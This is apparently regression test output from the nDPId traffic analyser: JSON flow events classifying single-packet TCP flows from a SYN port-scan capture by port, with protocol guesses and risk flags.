-00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00763{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2191,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00790{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"","password":""}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00791{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"","password":""}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":146,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4242,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":146,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4242,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2196,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2196,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 